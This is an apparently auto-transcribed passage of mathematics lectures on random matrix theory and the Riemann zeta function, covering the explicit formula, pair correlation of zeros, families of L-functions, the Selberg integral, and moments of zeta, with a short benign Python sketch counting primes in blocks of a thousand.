shifted away from that so that it lies at least further than 1 away of h of s zeta tilde prime over zeta tilde of s dx. And the proof just basically relies on computing that integral in two ways. So the first way you can compute this integral is explicitly. It's to note that zeta tilde, so method one, is to use the fact that zeta tilde of s is pi to the minus s over 2. Gamma of s over 2 zeta of s. So the derivative of the log of zeta tilde means I have to differentiate the log of pi to the minus s over 2. That's going to give me a log pi. I'm going to get the derivative of the log of the gamma function. Oh, here we are. It's precisely these two terms here. 
So those two terms, this integral, simply come from the first two factors here. The logarithmic derivative of zeta I've already defined for you; it's on the top board there: it's the sum of the von Mangoldt function over n to the s. And if you substitute that in, use the fact that if c is greater than 1 that sum converges, and integrate term by term, this gives you precisely the right-hand side of the explicit formula. So this integral is equal to the right-hand side very straightforwardly, simply by direct evaluation of the logarithmic derivative of this function, using the Dirichlet series for the logarithmic derivative of zeta in terms of the von Mangoldt function. The alternative is to use Cauchy's theorem, because h of s is an entire function, and so the only singularities of the integrand here come from singularities of the logarithmic derivative of zeta tilde. The logarithmic derivative of zeta tilde has singularities at points where zeta tilde is 0, that's at the zeros of the zeta function, or at the poles of zeta tilde, which are at 0 and 1. And those contributions, together with the functional equation, so you use Cauchy's theorem plus the functional equation, give you precisely the left-hand side. I won't do that for you on the board; it's a straightforward calculation. But that proves the theorem, and that is the explicit formula. So this kind of formula was first written down by Riemann in 1859 for very special choices of g and h, and in this generality it was due, as I said, to André Weil in the late 1940s and early 1950s, who recognized the sort of general structure. So this is how you prove it for the Riemann zeta function. Now, if you want to prove this for any L function, basically the calculation is the same. The only difference is that you have to consider the logarithmic derivative of that L function, and so you then have different coefficients here. You don't get the von Mangoldt function Lambda, you get the von Mangoldt function changed slightly, and it's that function that then appears in the explicit formula. So basically, for the example I've given you here of the quadratic Dirichlet L functions, you'd have the von Mangoldt function multiplied by a character chi. So for any L function, you have a similar formula. I take g to be symmetric because I want to use the functional equation very straightforwardly; I want to reflect the function g. Yes, yes, you can drop the symmetry, it just makes the formula look slightly less pretty, but you can do that. Now, I'll give you two examples of how this can be used, although I won't go through the proofs. You have two minutes per example. Two minutes per example, very good. Pity I didn't ask for ten examples, isn't it? By scaling theory, I think that would have bought me some more time. Right. So, two examples of the use of this. First of all, and I don't want to rub anything off the board under here, example one would be the prime number theorem. This is an example where you might want to choose g to be compactly supported in some range where you only pick up contributions from the primes and their powers in some interval, say from m equals 0 to x. So we can choose g to be 1 if log m is less than log x and 0 otherwise, smoothly interpolating, perhaps multiplied by root m to get rid of this factor. And if you work that through, and this is a non-trivial step, but it can be done.
The prime number theorem says that if you sum the von Mangoldt function over n less than or equal to x, this is asymptotic to x as x tends to infinity, and this is one of the high points of 19th century number theory. And this comes about because you can see how to arrange this sum to be just the sum of the von Mangoldt function up to x: you choose g so that the weight is root m if m is less than x and 0 otherwise. Essentially, under those conditions, you only pick up the contribution from this pole, and the contributions from the zeros are subdominant, because we know that there are no zeros on the edges of the critical strip, no zeros actually on the line real part of s equals 1 or real part of s equals 0. So the prime number theorem follows from that fact. And the Riemann hypothesis would buy you the optimal error term here, which is of the order of the square root of the main term. A second example of use would be this: if we want to count zeros such that the real part of t n lies between 0 and capital T, then we want to choose our function h to be a step function. And that means the price we pay is that the dual function g is quite delocalized, so it's a long sum, as we think of T tending to infinity. And then the statement is that, as T tends to infinity, the count is T over 2 pi times log of T over 2 pi, minus T over 2 pi, plus order log T. So this tells you that the number of zeros in the critical strip grows as you look higher up in the critical strip, like T on 2 pi log T on 2 pi, which means that the zeros get logarithmically more dense as you go up in the critical strip, and so the mean separation between the zeros decreases logarithmically with height in the critical strip. Thank you. Over by two minutes.
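For reference, the two applications quoted in this lecture, written compactly in the notation used above; psi(x) is just shorthand for the weighted prime count, and only what is stated in the lecture is recorded here.

```latex
% Example 1: the prime number theorem, obtained from the explicit formula.
\psi(x) \;=\; \sum_{n\le x}\Lambda(n) \;\sim\; x \qquad (x\to\infty),
% with RH giving an error term of the order of the square root of the main term.

% Example 2: counting zeros of height up to T.
N(T) \;=\; \#\{\,n:\ 0<\operatorname{Re}t_n\le T\,\}
      \;=\; \frac{T}{2\pi}\log\frac{T}{2\pi}\;-\;\frac{T}{2\pi}\;+\;O(\log T).
```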
I will give an overview of connections between Random Matrix Theory and Number Theory, in particular connections with the theory of the Riemann zeta-function and zeta functions defined in function fields. I will then discuss recent developments in which integrability plays an important role. These include the statistics of extreme values and connections with the theory of log-correlated Gaussian fields.
10.5446/54162 (DOI)
So let me remind you where we've got to so far. In lecture one, I basically told you that there is a duality, a Fourier duality, between the primes and the zeros of the zeta function. So if you have information about the primes, that tells you something about the zeros, and vice versa, and that's embodied in the explicit formula. In the second lecture, I told you that there is a conjectured relationship between the statistics of the zeros of the zeta function and the eigenvalues of random matrices. I framed this in the setting of random unitary matrices, but I should emphasize that everything I said yesterday would apply equally well to the GUE, to complex Hermitian matrices; there's no real distinction at the level of the discussion I gave yesterday. The limiting results as n, the matrix size, tends to infinity are the same in both cases. And the idea is that one can prove a result consistent with this connection. This is Montgomery's theorem, which says that for some limited class of test functions you can really prove this relationship. But if you want to prove it for a wider class of test functions, the functions that we believe it's true for, then you need information about pair correlations of prime numbers that we don't know how to prove at the moment. If you take the standard conjectures in the field, then you can establish this connection with random matrix theory, but we don't know how to prove those conjectures. And the question I left with was this: that conjecture about the pair correlation of the primes implies Montgomery's conjecture, but are they equivalent? Where I left off was with saying that, in fact, you can get away with less. So let me tell you what you can get away with, and let me tell you precisely what Montgomery's conjecture for the pair correlation of the zeros of the zeta function is equivalent to in terms of counting prime numbers. This goes back to a classical problem in the theory of primes, in fact one of the earliest problems, identified by Gauss. At the end of the 18th century, Gauss, as a prodigious young mathematician, did calculations of primes, counted primes in various intervals, and this led him to the experimental conjecture which is now called the prime number theorem. So the prime number theorem was originally proposed by Gauss in 1796, based on numerical computations, numerical data generated by hand. And what Gauss did was the following. He took ranges of consecutive integers, and in his calculations, which still exist, we have the notes in which he did the calculations, he considered ranges of integers of length 1000. So he considered the first thousand integers, the second thousand integers, the third thousand integers, et cetera. And all in all, in his calculations, he considered 3000 ranges of integers, which means he computed the primes amongst the first three million integers. Pardon? Gauss was the computer. And he said that by the time he'd got up to full speed, it took him 15 minutes to check a thousand integers. I should say that in 1796 Gauss was about 15 years old, so in that sense we're all past it. So he recorded very carefully how many primes there were in each range of 1000 consecutive integers. There is a name for 1000 consecutive integers, certainly in English, probably in other languages too: it's called a chiliad in English.
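As an illustration of the kind of experiment being described, counting primes chiliad by chiliad and comparing the counts with the logarithmic density, here is a minimal sketch. It is not Gauss's procedure, just a quick numerical analogue; the cutoff of three million and the block length of 1000 are taken from the numbers quoted above, and the use of sympy's sieve is simply one convenient choice.

```python
# Count primes in each chiliad (block of 1000 consecutive integers) up to 3 million,
# and compare with the prime number theorem's local density estimate 1000 / log(n).
import math
from sympy import sieve  # any prime sieve would do

N, BLOCK = 3_000_000, 1000
counts = [0] * (N // BLOCK)
for p in sieve.primerange(2, N + 1):
    counts[(p - 1) // BLOCK] += 1        # which chiliad this prime falls in

for k in (0, 999, 2999):                 # the 1st, 1000th and 3000th chiliad
    mid = k * BLOCK + BLOCK // 2
    print(f"chiliad {k + 1:4d}: {counts[k]:3d} primes,"
          f" PNT estimate {BLOCK / math.log(mid):6.1f}")
```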
Although I suspect that the origins of that term are not Anglo-Saxon. So in each chiliad, each range of 1000 consecutive integers, Gauss counted how many primes there were. He recorded that number, then the number in the next thousand integers, then the next, and he analyzed the data statistically. And he observed something like a normal distribution in the fluctuations. So you count the number of primes in a given chiliad, a number you record, then the number in the next chiliad, and so on; those numbers fluctuate. If he averaged over his 3000 chiliads, he ended up with the prime number theorem: the primes get logarithmically a little less dense as you go up, but you can compensate for that with what we would now call the von Mangoldt function. But he observed fluctuations around the average that's given by the prime number theorem. And he sort of understood that the data pointed to a central limit theorem, although he didn't state it quite in that way, and he sort of understood that the variance of these fluctuations was an interesting quantity. So how would we, in modern notation, set up this variance? Well, to count the primes in a range of consecutive integers, let's count them between X and X plus H. So in Gauss's experiment capital H would be 1000. And we understand now from the theory of the zeta function, explicitly from the explicit formula, that the right way to count the primes is to count the primes and their powers together, using the von Mangoldt function. And so we want to estimate something like this. In Gauss's case capital H would be 1000, but you can think of it as a general variable. And the question is, what's the size of this sort of sum? In modern terminology this is counting primes in short intervals: we're not looking at the sum from n equals 1 to some very large number, we're looking from one very large number to that number plus capital H, which may also itself be large. So what would you expect for this? Well, the prime number theorem tells us that the average size of the von Mangoldt function is one, because, I remind you, the prime number theorem says that if we sum the von Mangoldt function from 1 to capital X, this is asymptotic to X. So the average size is one, and we'd expect this sum on average to be capital H. So let's subtract off capital H, that's what we expect it to be on average, and then ask what the variance of this quantity is: we square it and then average with respect to the starting point. This is, in modern terminology, the variance that Gauss was interested in. He had the numerical data, but he didn't frame a precise conjecture for what this was. If the primes were completely uncorrelated, Poisson-like variables, we'd expect the variance to be the size of the mean, so we'd expect this to be H. That turns out not to be the case. And there's a conjecture of Goldston and Montgomery that the correct answer should be H times the log of X over H, plus some constant, and the constant has a known precise value. This is asymptotic as capital X tends to infinity, and technically we need the range to grow with capital X, but it can grow very slowly. So capital H has to be between X to the epsilon and X to the one minus epsilon: basically, capital H has to grow more quickly than some small power of X, as small a power as you like, but it can't grow more quickly than X itself.
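In symbols, the variance being set up here is the following. This is just a transcription of the statement described above, with psi(x) the sum of the von Mangoldt function up to x; the averaging over starting points is written over [X, 2X] as one standard normalization, and the precise constant is left unspecified, as in the lecture.

```latex
% Goldston--Montgomery: variance of (weighted) prime counts in short intervals.
\frac{1}{X}\int_{X}^{2X}\Bigl(\psi(x+H)-\psi(x)-H\Bigr)^{2}dx
 \;\sim\; H\left(\log\frac{X}{H}+c\right),
\qquad X^{\varepsilon}\le H\le X^{1-\varepsilon},\quad X\to\infty .
```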
And this is the conjecture of Goldston and Montgomery for what the variance should be in the kind of numerical experiment that Gauss did. And the theorem, which I won't prove for you, is that Montgomery's conjecture is equivalent to Goldston-Montgomery. That is, if I know the pair correlation of the zeros of the zeta function, that implies Goldston-Montgomery, and vice versa. So this is why it's important to know about the pair correlation of the zeros: this is the sort of information it gives you about the primes, namely fluctuations in counting primes in short intervals, so fluctuations around the prime number theorem. Now, how do you prove this? Well, you put the explicit formula into this sum. You know what to expect now: the explicit formula will replace this sum by a sum over zeros. This is a fairly localized sum, so we expect a very long sum over zeros, and since we're squaring it, we get a sum over pairs of zeros. So the left-hand side can be written as a sum over pairs of zeros, but that's precisely what Montgomery's conjecture tells us about. So that's the philosophy here. And I should say that Hardy-Littlewood, the conjecture about the pair correlation of the von Mangoldt function, implies Goldston-Montgomery. So you can derive this Goldston-Montgomery conjecture two ways: you can either assume Montgomery's conjecture or the Hardy-Littlewood conjecture, and you get the same answer in both cases. Now let me tell you a little bit about how all this generalizes to L functions. This implication does not assume the Riemann hypothesis; it's unconditional, this implication here. No, it doesn't assume the Riemann hypothesis. It might assume it in some form, in the sense that I didn't specify an error term in the Hardy-Littlewood conjecture; this assumes a well-behaved error term, and I'd have to think through exactly whether the assumption on the error term is equivalent to the Riemann hypothesis. At the moment I don't think it is, but I'm not completely sure about that. So now, what about L functions? I'll be a little schematic here; I'll give you a flavour of where the subject stands without going into too many details. Well, I told you yesterday that there are lots of L functions, infinitely many, and they fall into different classes. One way to classify them is in terms of how many gamma functions appear in the functional equation. There are 19th-century L functions, like the Riemann zeta function and the Dirichlet L functions which I introduced, which have one gamma function in the functional equation. The 20th-century L functions, those associated with elliptic curves or modular forms, have two gamma functions in the functional equation. And we now know that there are many others, with an increasing number of gamma functions, and these are being studied at the moment. And, since many people here like special functions, you can think of these L functions as the special functions of number theory. There is a database of them, a little like the sort of books that we all know and love with properties of other special functions: the L-functions and Modular Forms Database. You can find, I think now, about 3 million L functions there, with their properties tabulated, asymptotics given, et cetera, and plots of the first few zeros. So that's a resource, a database, that you find online. So the idea is that if you fix your L function, any L function, we expect it, as I told you yesterday, to have a Riemann hypothesis.
And for any L function, if you look at the statistics of the zeros vertically, that is, along its critical line, you get the same answer as for the Riemann zeta function. So the pair correlations of the zeros will be the same as those of random unitary matrices, or GUE if you prefer. And everything works out as I said yesterday: you can prove a theorem consistent with that, and you can generalize that theorem to all k-point correlations, or k-tuples of zeros. This is for a fixed L function, looking vertically in that way. And this then tells us something about the generalization of the Goldston-Montgomery conjecture. So if you know the pair correlation of the zeros of an L function, that gives you information about the generalization of Gauss's problem where you replace the von Mangoldt function by the von Mangoldt function associated with the L function, and that's just defined in terms of the logarithmic derivative of the L function. So there's the variance formula that I've written at the top there; there's a generalization of that to all L functions, where basically you replace the von Mangoldt function with the generalized von Mangoldt function associated with the L function in this way. And the only way we know how to approach this is via random matrix theory, so random matrix theory is very important in this context. Another game you can play is not to fix your L function and look vertically along its critical line, but rather to consider a family of L functions. So here's one, here's another L function, here's another L function; they each have their own zeros. May I ask a question: for L functions, what's the analog of the primes? The primes themselves, but the primes would be weighted differently. So if you remember the example that I gave you yesterday, the Dirichlet L functions: you simply get them by taking the Euler product over the primes, but you weight the primes with some function which is a character of the multiplicative group modulo d. So it is a good question: in a sense, the analog of the primes are the primes, but they have these extra weights associated with them. And, for example, Dirichlet introduced these so he could count primes in different arithmetic progressions; what this character does is pick out different arithmetic progressions. So I'm thinking schematically now: I'm thinking of taking a number of different L functions. For example, it could be this family of L functions which is parameterized by an integer d. So my integer d could be increasing in this direction, this is d equals one, d equals two, d equals three, et cetera, these are the L functions associated with those values of d, and here's a formula for those L functions. And it was an idea of Katz and Sarnak, in about 1998, to ask not what the statistics of the zeros are for a fixed L function vertically along its critical line, but: what if we fix a height on the critical line and average through a family of L functions? So we average horizontally rather than vertically. So what's a sort of horizontal question? It might be: what's the height of the first zero? That's a question you can ask for a given L function; for each L function there is a height of the first zero. What would the distribution of those heights be? Or, put another way, and it's a different question now: what's the probability that I have at least one zero within distance alpha of this point here?
Again, there will be a number of zeros for each L function in a range of height of size alpha measured from this point here. That number will fluctuate. What are the fluctuations? And it was realized by cats and sarnac that if we average vertically, you always get the unitary group. If you average horizontally, you can get depending on which family of L functions you take, either the unitary group, the orthogonal group, or the symplectic group. So in particular, this family of L functions, the Dirichlet L functions, these form a symplectic family. And if you take L functions associated with elliptic curves, which we have not defined for you, that would take me too far afield, you get the orthogonal group. And then the calculations that I showed you yesterday, you can reproduce in these various different settings. So you can ask for the unitary group, the orthogonal group, and the symplectic group separately, what are the correlations of the eigenvalues of matrices representing elements of those groups? You do those calculations, and then there's an analog of Montgomery's theorem for various families of L functions where your average is horizontal rather than vertical. And the finding is that the analog of Montgomery's theorem matches random matrix theory in each case, but you get different answers so that the answers are different for unitary, orthogonal, and symplectic. So you see the differences between families of L functions in the statistics of zeros near to this point, the sort of symmetry point, the reflection point of the function equation. You see differences in the statistics and those differences represent the different classical compact groups. And whilst this is again a fact, a numerical observation, the data is very extremely convincing, there are theorems consistent with this data that differentiate these groups and that express consistency for various horizontal averages with random matrix theory. Again, these theorems, like Montgomery's theorem yesterday, are a little uninsightful in that you do a calculation in number theory, it looks nothing like a calculation in random matrix theory, but lo and behold, you get the same answer. But you don't see any reason why you get the same answer, I would say that these calculations give one confirmation but little perhaps insight or little deeper philosophy as to why this is true. But that's all I want to say about this generalization other than that it exists and it's very important and it gives one a much bigger picture. But the pictures simply like for the Riemann's Eta function, you do complicated calculations, the combinatorics become very difficult, but lo and behold, you get an answer that matches an answer that has some determinant structure coming from random matrix theory, but you don't see that determinant structure or that integral structure anywhere in the number theory, it's simply a coincidence. Yes. Yes, yes, yes, yeah. Even for the low line zeroes because the density depends very slightly on D. And so as you go in this direction, the zeroes get more dense. Right. So for the horizontal average, the density of zeros goes like log of DT over 2 pi. So it increases log, if you fix T, it still increases logarithmically with D. Or even some weird, I don't know. Yeah, I mean, there are, there are, there have been numerical explorations which do allow one to explore this sort of picture in all sorts of different directions and there is an interesting story there, but that would take me a long time to tell. 
So vertically, for any L function, you have... Yes, exactly, no more; this is all that one gets. And if I have time tomorrow, and I'm not sure exactly what I'll do tomorrow, it depends on how much I get through today, I may tell you that there is a world in which this is a theorem. Everything I've told you so far about the Riemann zeta function and the L functions concerns these special functions, the L functions, defined over the integers. If you go to a more algebraic setting, where you associate these L functions with polynomials defined over some finite field, then everything I've said so far is a theorem, and you can prove it all in a certain limit, which I may get around to telling you about tomorrow. If not, I can answer over coffee if anyone's interested. But everything I've said so far becomes a theorem in this rather babyish setting, and there you can really identify what these groups are, and these classical groups are the ones that appear. Okay, but I think what I want to do today is to move on to a different class of problems, which illustrate in a different way the relationship between number theory and random matrix theory, and show that it's a very deep relationship but still somewhat mysterious. This is the problem of moments. So rather than looking at the statistics of the distribution of the zeros of an L function, I now want to think about the distribution of the values of the L function, which will be zero at the zeros and nonzero in between. I want to know what the probability distribution is of the values of the L function on the critical line. And in random matrix theory, the analog of this would be to look at the characteristic polynomial. So I take my unitary matrix A, I'm back in the unitary group now, and I form the characteristic polynomial, the determinant of I minus A e to the minus i theta, which is just the product over the eigenvalues of 1 minus e to the i times theta n minus theta. You can think of this as the analog of a zeta function, in that it has zeros, and the zeros of this function are the eigenphases of the matrix A. In that sense it's a function with interesting zeros, just like the Riemann zeta function is. So let's study its values, and the problem I want to consider is the moments: of the several problems one might consider, the moments would be the average of the modulus of the determinant raised to the power 2 beta. In random matrix theory this is an interesting problem, and it can be addressed in a number of ways. In particular, it can be addressed using Fisher-Hartwig asymptotics: you can write these moments in terms of Toeplitz determinants, and so the sorts of material that you've been seeing in Estelle's lectures and Alexander's lectures become important. But I want to take a slightly different approach, which is something Alexander mentioned yesterday: you can write these moments exactly. I said yesterday that the average over the unitary group, and this is an average with respect to Haar measure on the unitary group, has a formula, called the Weyl integration formula, which allows you to write this exactly as a multiple integral. Alexander wrote down examples of this kind of integral. So we take the quantity we want to average, that's the quantity here, and write it in terms of the eigenvalues. Well, here's a formula for that.
So we have the product, n from 1 to capital N, of the modulus of 1 minus e to the i times theta n minus theta, raised to the power 2 beta. That's the quantity we want to average, and the measure coming from the Weyl integration formula is just the Vandermonde factor. So that's a formula for the moments as an N-fold multiple integral with a very explicit integrand. And if you do write this as a Vandermonde determinant, you can analyze the problem in that way, and then, if you want to consider the large-N asymptotics, you're immediately led to a problem of exactly the sort that Alexander and Estelle have been considering. There is a different approach, as Alexander mentioned, which is to use the Selberg integral. So I'll do this on the board over here. I'm sure many of you have met this integral: Euler's beta integral is an integral of the form integral from 0 to 1 of t to the alpha minus 1 times 1 minus t to the beta minus 1, dt, and Euler famously evaluated this to be gamma of alpha gamma of beta divided by gamma of alpha plus beta. And it was a question first raised by Selberg whether there's a multi-dimensional analog of this. Selberg considered a multiple integral over the box from 0 to 1, an integral of that form, and he found that there is an answer for it which resembles this product of ratios of gamma functions; it's an exact evaluation of this integral. And the story is rather interesting. Alexander has been talking interestingly about the history of Riemann-Hilbert problems and Szegő's theorem, and so has Estelle; the history here is no less interesting. So Selberg, when he had this idea to look at integrals like this, was a PhD student in Norway in 1941, which was a time when there was perhaps less mixing in the mathematical community than there would be now. So he wasn't aware whether this had been studied before or not, and he rather suspected that this integral had already been evaluated. He evaluated it in 1941 and mentioned it in the footnote of a paper. Then by about 1944 he'd searched the literature and hadn't found an evaluation of this integral. He wrote a fuller, more extensive paper, but he still thought that probably this was known to experts, that it may even have been known to Euler. And so he buried this paper in about the most obscure way that you can: he wrote it, first of all, in Norwegian, which is understandable as that was his native language, but he published it in a journal for Norwegian high school teachers, about the most obscure journal you could imagine. In 1944 he published the answer, which, as I say, resembles this formula; I'll give you a special case of it in a minute. Does that tell us something about the quality of Norwegian high school education? Absolutely, yes, and it tells us also about the quality, if you like, the culture, of us as a mathematical community. So Selberg wrote this in 1944, and the history is rather curious: the paper wasn't cited at all in any following publication until 1979. So it went completely unnoticed. That's perhaps understandable, not many people would go to this journal, but Selberg was a Fields medalist in 1950, so you would have thought people might have looked at his early papers and dug this paper out; but it seems nobody did. And in the meantime, many people worked on this problem, on special cases of this integral. So famously Dyson thought about this in the 1960s and 1970s; Mehta did too.
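A sketch, for reference, of the objects being written on the board: the moment as a multiple integral via the Weyl integration formula, and the closed-form product of gamma functions that the Selberg-integral route described here leads to. The notation M_N(beta) and the explicit Haar normalization are written out here for convenience; they are not notation used in the lecture itself.

```latex
% 2*beta-th moment of the characteristic polynomial, Haar average over U(N):
M_N(\beta)
 \;=\; \Bigl\langle \bigl|\det\!\bigl(I-Ae^{-i\theta}\bigr)\bigr|^{2\beta}\Bigr\rangle_{U(N)}
 \;=\; \frac{1}{(2\pi)^{N}N!}\int_{0}^{2\pi}\!\!\cdots\!\int_{0}^{2\pi}
   \prod_{n=1}^{N}\bigl|1-e^{i(\theta_n-\theta)}\bigr|^{2\beta}
   \prod_{j<k}\bigl|e^{i\theta_j}-e^{i\theta_k}\bigr|^{2}
   \,d\theta_1\cdots d\theta_N
 \;=\; \prod_{j=1}^{N}\frac{\Gamma(j)\,\Gamma(j+2\beta)}{\Gamma(j+\beta)^{2}},
% with large-N asymptotics  M_N(\beta) \sim \frac{G(1+\beta)^{2}}{G(1+2\beta)}\,N^{\beta^{2}}
% (G the Barnes G-function), as quoted in the next part of the lecture.
```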
And many people thought about trying to evaluate special cases of this integral, unsuccessfully, without knowing that Selberg had already evaluated the general case. It's all the more surprising that Dyson was in the same institution as Selberg and was trying to do this for at least a decade, and Selberg didn't tell him he'd done it. And it seems he was aware of this; it seems that he was secretly enjoying the fact that this whole community of random matrix theorists was trying to evaluate these integrals, they're called the Dyson conjectures and this sort of thing, all already proved in a result of Selberg's that was at least 20 years old, and he didn't tell anybody until Bombieri, another Fields medalist, got interested in these multiple integrals and went to ask Selberg's advice. Only at that stage did Selberg reveal that he'd already evaluated this integral that people had been struggling for nearly 20 years to do. So there's a little insight into the psychology of various famous mathematicians. Now, our integral looks exactly like the Selberg integral, of course; there's some change of variables that needs to be done, and I won't go through the details of that. The change of variables is not straightforward, but you can see that the structure is more or less the same. And this evaluates to be that product of ratios of gamma functions, using the Selberg integral. So that's an exact evaluation, and I should emphasize that the reason why you can evaluate the Selberg integral, and it's not at all clear from Selberg's writings on it, is that there's a very deep reason why these integrals are exactly of the kind that can be evaluated, and that's very much connected with the theory of integrable systems. These integrals happen to be very closely related to representation theory. There's a generalization of them which makes that much clearer, called the Macdonald constant term identities. So there's a deep connection between root systems of Lie groups, the symmetries of those root systems, and the ability to evaluate integrals like this, but I won't go into that now. So you can evaluate these integrals, for very deep reasons, and that's the answer in this case. And if you evaluate this asymptotically, it becomes G squared of 1 plus beta, divided by G of 1 plus 2 beta, times N to the power beta squared, where G is the Barnes G function that we saw yesterday in Alexander's lectures. To remind you, the gamma function satisfies gamma of s plus 1 equals s times gamma of s, and the G function satisfies G of s plus 1 equals gamma of s times G of s. So it's an entire function of order 2 which generalizes the gamma function. And as Alexander emphasized, this function appears very naturally in Fisher-Hartwig asymptotics, and that's no surprise: you could address this asymptotic problem using Fisher-Hartwig theory as well and get the same answer. So we understand moments of characteristic polynomials. You can generalize the moments. One generalization that's proved very popular in recent years is the following: let's say A and B are sets of cardinality k; then we can consider a product over alpha in A of the determinant of I minus A e to the minus i theta plus alpha, times a product over beta in B of the determinant of I minus A... oh, that's bad notation, isn't it, with A used twice. So let me call the sets C and D then. Can I have alpha and c? I suppose I can.
If I take the complex conjugate of the second one, then these sort of shifted moments are of considerable importance in random matrix theory. They reveal the symmetries behind the characteristic polynomial in a way that the moments don't; the moments are degenerate cases of these shifted moments, when all the alphas and betas tend to zero. And one can evaluate these averages as well. In this case the Selberg integral doesn't help you, there isn't a Selberg integral that we know of to evaluate averages of this kind, but there are other tricks that allow you to evaluate them. So the integrable structure comes in, and we know how to evaluate products like this, and in the limit as alpha and beta tend to zero you recover the moment formulae. I'm mentioning this generalization because it will become important when I talk a little bit about number theory. So now, what's the number theory analog of this? Well, we've learned to expect that the average over the unitary group is like an average along the critical line. So in the case of the Riemann zeta function, we take the zeta function on the critical line, take the modulus of that, raise it to the power 2 beta, and then average along the critical line. These moments for the zeta function have a long history; they were first studied by Hardy and Littlewood in 1918. And the question is, can one evaluate the asymptotics? So this is purely a problem in asymptotic analysis, there's very little number theory now: I defined the zeta function for you as a sum over the integers, and so this looks like a straightforward problem in asymptotics. We're not letting beta grow here, so there's no subtlety associated with that. But it turns out to be extremely difficult, and there's a long and very tortured history to this problem. So there is a general conjecture, which I'll write in modern form: we expect this to go asymptotically like log t to the power beta squared at leading order, and we expect there to be a pre-factor to make this a good asymptotic. And the pre-factor is expected to be a constant, a function of beta, which is given by a product over primes. So there is some function of beta which you can write down very explicitly as a product over primes. But the problem is, it's now understood that that's not correct. So this was initially thought to be correct, but it's now not thought to be correct, and the question is: what's the fudge factor that makes this a correct asymptotic? And the reason this is subtle, the reason people originally missed out the fudge factor, is that the theorem of Hardy and Littlewood is that f zeta of 1 turns out to be 1. That's a theorem of Hardy and Littlewood in 1918. Where the problem became interesting was when people calculated f zeta of 2: this turned out not to be 1, it turns out to be a twelfth, and this is a theorem of Ingham in 1926. So you get the picture. Yes, so there's some function, and the question is what function of beta. Is the definition of f zeta just this prefactor? Exactly; well, no: the definition is, what is the function, assuming it exists, given by the 2-beta-th moment of the zeta function, divided by log t to the power beta squared, divided by this arithmetic function of beta. Is that clear? Is it a conjecture? Well, I don't know what this is for general beta; I know the value of f for beta equals 1 and beta equals 2, and what I'm about to tell you there is a theorem. Exactly.
I'm writing this in a rather convoluted way for a particular reason, just to tease my audience. And I'm glad that I... yeah. First of all, I think historically it was thought that f of beta would always be 1, because its first value was 1. Then it was realized that f of 2 is a twelfth. So the first surprise is that it's not 1, and the second surprise is that, if it's not 1, it's a rational number. There's no a priori reason to expect f of beta to be anything in particular; if it's going to be anything, you might think it would be 1, but if it's not going to be 1, there's no reason to expect it to be a rational number at 2. And, as I'll indicate tomorrow, the history then gets very murky. We don't know any other value of f zeta rigorously; there is no further theorem on this matter. But there are conjectures. So I'm going to write a twelfth as 2 over 2 squared factorial, and 1 as 1 over 1 squared factorial. So you might think: now you spot the pattern, 1, 2. Well, f zeta of 3 is conjectured to be 42 over 3 squared factorial, and this is a conjecture of Conrey and Ghosh in about 1990. And f zeta of 4 has been conjectured to be 24,024 divided by 4 squared factorial, and this is Conrey and Gonek in about 1998; the dates are a little imprecise there. And the sort of prehistory of the subject is that you have a theorem in these two cases and conjectures in these two cases. So there is a method, clearly, that's giving rise to these numbers. But if you then apply that same method to any value of beta greater than 4, you get a negative answer, and clearly you're trying to calculate something that's strictly non-negative. So this is leading-order asymptotics that's extremely difficult, and I'm not making fun of the people who were involved in this; this is a huge, huge enterprise and a great achievement that they got this far. But it's clear that the method they were using, whatever that method is, and I'll tell you more about that tomorrow, is actually on very shaky ground, because if you apply that exact same method for any value of beta greater than 4, you get answers that are manifestly ridiculous. So the question is, what's going on here? How does random matrix theory play a part? How does number theory play a part? How do we understand this catastrophe of things sort of suddenly becoming negative when they obviously have to be positive? How does this generalize? We now have a more general understanding of this asymptotics: these moments should grow not just as log t to some power; for the integer moments there should be some polynomial, a polynomial of order beta squared. And the belief now is that the asymptotics is given by a polynomial function of log t of order beta squared, and then the remainder is exponentially small in that large variable, log t. So it's a very interesting form of asymptotics, where you have a finite asymptotic expansion and then the terms beyond that become exponentially small. I'll tell you more about this tomorrow. And what about this final product over the primes: where does it come from, and how does it enter when you set up the problem? Again, I'll tell you more about that tomorrow. But crudely speaking, if you were to do a completely ridiculous thing, and try to substitute the Euler product for the zeta function in here, now this is a ridiculous thing that you would only try amongst your very closest friends.
You put the Euler product in here, and you assume the primes are independent of each other. So you can interchange the average and the product over primes. You're basically led to this formula with f is one. And I think almost certainly that's what Hardy and Littlewood did when they framed the conjecture originally, but they didn't say that. And so. So can I say this degree of log independent? Exactly. Exactly. F is the, exactly. F measures correlations between the primes in a way that we've seen that random matrix theory captures. Okay, so thank you very much. We have several questions. So some further questions or comments. Can you maybe define how what characterizes a class of L functions, because there is clearly something going on with the. Yes. So is there some sort of a condition on this class that's giving rise to this? No, there is no, I would say there are many papers written on this subject, but I would say I can't distill all that information down into a bite sized piece of information. I would say I do not understand what constitutes a family of L functions in this context. So there are natural getters. So you might take all the Dirichlet L functions to be a family. You might take all twists of some elliptic curve to be a family, but there's no a priori reason why you would believe that. And what it usually boils down to is an experimental observation that you take a group of L functions, you do some calculation that's like Montgomery's conjecture, and then you find it happens to agree with random matrix theory for one of the classical groups. And then you say, aha, this is a family, and it's an orthogonal or a symplectic or a unitary family. Now that that's slightly overstating the case. There are sorts of indications that one might look for. But this I would say is still at the level of of intuition driven experimental science, not what I would call a sophisticated all embracing philosophy. So I think that's a rather significant question. Is there some relation between the distribution and the number of gamma functions, the product of gamma functions that you find out? Very good question. Yeah. So, so the the number of gamma functions does appear. I didn't emphasize this because it was taking me too far. But the, for example, the number of gamma functions that appears would appear in this formula there. So the fact that the number of gamma functions for the z function is one means there's a one there. If you were to put, if you were to look at L functions with two gamma factors, there will be a two there. So it does appear. Some other questions. And just perhaps just to say that again, the number of gamma factors appears in this picture in a very profound way. And this is the origin of a lot of its appearance. For the for L functions with one gamma factor, they all have essentially the same density of zeros. And it's given by a formula like that. So if you fix D, this gives you the density as T grows. And if you fix T, this gives you the density as D grows. If you have two gamma factors, you have twice the density of zeros. Three gamma factors means three times the density of zeros. So another way of saying how many gamma factors are there in the function equation is what's the density of zeros, what's the ratio of the density of zeros to that of the Riemann's Eta function. And it's an integer. It's there. Yeah. Okay, thank you. So any other questions? Okay. So this asymptotic description of the leading order of behaviors log T to the beta squared. Yes. 
